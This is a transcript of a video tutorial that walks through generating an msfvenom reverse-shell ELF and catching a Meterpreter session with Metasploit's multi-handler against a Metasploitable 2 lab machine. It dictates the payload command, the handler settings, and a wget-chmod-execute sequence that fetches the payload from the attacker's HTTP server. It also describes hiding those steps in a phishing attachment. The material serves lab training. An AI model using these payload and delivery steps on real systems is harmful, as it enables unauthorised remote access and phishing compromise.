Hey everyone, Rick here from Port Zero. In this upcoming video, this tutorial, we're going to use Metasploit's multi-handler module to catch a reverse shell from our target machine coming up in utilizing our Metasploitable 2 as our victim. So this technique, it's commonly used after you've delivered a payload to a victim machine. So one of the things you're going to see, so some of the tools, I should say, that we're going to be able to kind of show in this video are it's going to be our attacker, our Kali Linux attacker machine. We're also going to have our Metasploitable 2 victim machine. We're also going to have be able to see how we utilize the Metasploit framework, specifically to be able to capture a Meterpreter session on our target machine. We're also going to be able to set up a Python HTTP server listener on port 8080 to be able to transfer, to be able to receive a file from the attacker machine to the victim machine. And then you're going to see how we lay out the commands that would typically be set up in our payload that would be executed from that malicious file that we sent on our phishing campaign to the target. So we'll be utilizing the wget request or command to be able to pull that file from our Python server. So this is going to be a fun episode. So have fun with it. Please let me know in the comments and all that, what you thought. But the biggest thing is we want to take away is this is basically Port Zero's disclaimer. It's for educational purposes only. We're doing this in a controlled environment. This is inside our environment here, inside the office. So basically, we're kind of giving ourselves permission to be able to target this. So anyone can download Metasploitable 2, run that as a VM in your environment, and you can target that all day long. So be careful when you're doing this. You don't want to get this out and do this on anybody else's systems without explicit permission. So without further ado, let's walk through how we set this up and execute all this. Okay, so we're going to start by generating a reverse shell payload that once executed on the target, we're going to connect back to our Kali machine. So before we get into the commands, just kind of orient everybody to the screen. So we've got right here on our left side, we have our attacker machine, which is our Kali Linux. And then on our right side, we have our Metasploitable 2 machine, which is our victim machine. So I have these side by side right now. So that way, once we get into kind of getting in the weeds of explaining how a few of these commands will work, that way you'll be able to see side by side what it looks like from the victim side and then also from the target or the attacker side. So we're going to start off with building our payload. So here we go, msfvenom. So our -p for our payload, and we're going to use our Linux 86 Meterpreter reverse TCP payload. So x86 Meterpreter reverse TCP. And then our listening host is going to be our attacker machine. So lhost equals 192.168.227.5. And our listening port equals 4444. Okay. And then we're going to put in our executable. We're going to have this as our executable file. It's going to be an ELF file, which is our Linux executable, shell.elf. Okay. So that's building that out for us. As we wait on this to build out, as you can see here, final size of the ELF file, 207 bytes. We can come into our directory real quick, and we've got our shell.elf file. Okay, so now after we do that, so our next step is we're going to open up our MSF console, which is to try to get our Meterpreter prompt. So MSF console. So we've done this in previous videos. And for those that know, in the previous video, I used the quiet flag, which is a -Q. So that way your big banner and everything else doesn't come up. But in this one, let me just show you for those that don't understand or don't know what it looks like. So if we use a -Q, the banner is not going to arise, but I'm going to go ahead and leave out the quiet. So we're going to run that MSF console. You're going to see how it's starting the Metasploit framework. So once if we use a Q flag, you wouldn't see any of that. It would just, it would go through this behind the scenes, and then we would see our MSF6 prompt. So, but as you can see, it's coming through. We're going to get a nice little big kind of like cartoonish little piece on here once it fully loads. And also too, you can see kind of how long this takes it to it fully load when we don't use the -Q flag. So so you can see here it kind of builds like, and every time you open it, it'll have something different. So it gives us this here. So we're still waiting on the MSF6 prompt. But whenever so my point was, if we take out the -Q, or if we put in the -Q, typically it runs a little bit faster. So that way we're not waiting on all this to build. So anyway, so right here, this is our Metasploit. So now we're going to build, use our multi-handler. So we want to use our exploit multi-handler. So we've got that created. Now we have to set a payload. We've got to set our L host, and we've got to set our listening port. So set payload. It's going to be our Linux x86 interpreter reverse TCP. It's running a little slow right now. I can hear the VM working. So on my host machine. Actually, we spelled that wrong. All right, so let's go back. Set payload. It was probably trying to figure out what I was trying to say. There we go. So here, now we're going to set, like I said, set our L host. Set L host 192.168.227.5. That's our target, or that's our, I'm sorry, that's our attacker machine. Set L port 4444. Okay, so now what we're going to do is we're going to exploit. So now basically what's happening is Metasploit is listening for incoming connections on port 444. So now let's assume we've delivered the payload to the target, to our victim, using an exploit, phishing, or manual upload. So we're going to simulate this in our right machine, which is our Metasploitable 2 machine. So imagine a scenario. So instead of us directly running commands on the target, which we're going to do here just for training purposes, but a phishing email we send a phishing email and it contains a malicious attachment, like a fake invoice or a receipt. And then when the victim opens the file, the script inside, it silently runs the following command. I'm gonna show you the command we're gonna run. It's gonna run a wget command in the background, and to be able to fetch and execute our payload. So this is how attackers can trick a user into unknowingly running a malicious code. So in our case, we're going to simulate it manually for learning purposes. So let's go ahead, and I'm going to open up another prompt here, and I'm going to set a HTTP, or I'm getting ahead of myself here, server, and then 8080. Okay, so I'm going to set up basically it's listening on port 8080. And so now what I'm going to do is on my Metasploitable machine, so what we're going to do here is I'm going to actually manually type in these commands on our victim machine. So that way it shows you kind of what the script's going to look like in the background. So what we're going to do is we're going to do a wget, and this is going to take us back to our IP address, the open port, which is going to be 8080, and then the file that we want to be able to retrieve from there. So 92.168.227.5, okay, and then colon 8080, that's our port, and then we want the shell .elf. Okay, so as you can see here, on our victim machine, it was able to pull in the shell.elf file, which is our Linux executable. So from here, that's just one portion of it. So now we want to be able to change or modify. So we're going to do a chmod plus x shell.elf. Let me move this back out of here so everybody can see. And then we want to be able to execute that. Okay, so think about this, since we're showing it manually, this is actually, if we embed, like I said, this code on a malicious file, this can be executed in the background inside that code. So as you can see on our attacker machine, once we got downloaded that file onto our Metasploitable 2 machine, if you look back into our Kali Linux, we've got on our Python, we've got our HTTP server, we've got a 200 request, or a 200, we got a good request. So you can see that from our side, it went through and it was executed. So from here, what I'm going to do is, before I hit enter on the shell.elf, let's go ahead and minimize our Python. Oop. Open up, come back over here. So before we executed it, we're going to be able to look at our attacker machine on our Kali, and we're going to see that we're going to be able to get a shell once this is executed. So come back over to here. Oh, there we go. Shell.elf. So we will run that. Sorry, forgot to put the /. So now that the executable Linux file has been executed on the victim machine, on the left side here, you can see on our attacker machine, we've got a reverse shell. So we've got a Meterpreter session on our machine. So you can see right here, sending stage, that's our victim IP, 227.4. We've got a Meterpreter session opened from our attacker IP to our victim IP. And then now we've got our session. So what we can do here is we can run a few commands just to make sure, or just see that we're actually in the system. So we can run commands to be able to gather info, check network interfaces, and basically view running processes and navigate any file systems that are in there. So let's run a few. Sysinfo. As you can see, we've got on our target machine, the operating system is Ubuntu, and it's a Linux machine. UID. The server, as you can see, the server username is msfadmin, which is the default for our Metasploitable 2. ifconfig. And this is like, if, for those that are new to this, it'd be like if we were just sitting inside that machine, and this is some of the commands. So we want to be able to find out what our IP address and all that is. So the victim machine IP 227.4. And then we can do, we can see running processes on that machine. So it gives us a list. Our PS command gives us a list of all the running processes. We can find out let's do where we're at inside the environment. So we're at home, msfadmin. We're doing ls, so we can list whatever, if there are files and stuff in here. So as you can see from our target machine, the shell.elf does sit inside under the home msfadmin. That shell file, or the msfvenom payload that we made and created, you can see it was downloaded into their home msfadmin directory. And then we could, if we wanted to, we could change some of these directories. So we can go to cd vulnerable ls, and inside here we've got some other files as well. So hopefully you got something out of this. You can see a couple of key points. Typically, whenever I run MSF console, I'm going to run it with the quiet command or the -q flag, so that way it takes a little bit quicker for MSF 5 or 6 to kick up, depending on the version that you have. We also typically will send this with an attacker. We're going to send this, the shell, the msfvenom file will typically be embedded in some type of attachment. But for this learning purposes, we kind of showed you what it would look like behind the scenes. Is executed within the command line of our victim machine, and the different commands that it would take to be able to execute that file. And then what we saw was once the file was executed by the victim, we did see that Meterpreter session take place and open on our attacker machine. So hopefully you got something out of this. Okay, so what you just saw, it's a foundational technique for offensive operations. Whether it's delivered through a script or embedded in an exploit, the multi-handler lets you catch connections and control the flow of your target machine. So stay tuned. We'll show how to deliver these payloads using different attack vectors in the upcoming video. So hopefully you got something great out of this. Please comment, like, share this video. Let us know exactly what you'd like to be able to see next time. So once again, stay secure, stay vigilant.